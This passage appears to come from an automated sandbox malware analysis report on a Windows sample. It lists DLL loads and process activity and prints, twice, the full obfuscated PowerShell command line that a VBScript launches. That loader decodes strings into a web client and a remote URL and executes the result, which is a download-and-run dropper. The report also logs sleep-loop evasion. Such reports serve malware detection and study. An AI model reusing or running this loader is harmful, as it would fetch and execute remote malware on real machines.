      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdbpdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbT source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCEC6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: utomation.pdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute Tempereringen,Cacotrophia,Grubworms,Trilithon ,Fedtsten177ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptEngine", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptHostEncode", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\DropHandler", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers\WSHProps", "Unsupported parameter type 00000000");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHost.Sleep("100");IHo
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB9AAF5205 push eax; ret 2_2_00007FFB9AAF5251
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB9ABC79FE push ds; ret 2_2_00007FFB9ABC79FF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB9AD61CE4 push esp; retf 2_2_00007FFB9AD61D09
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
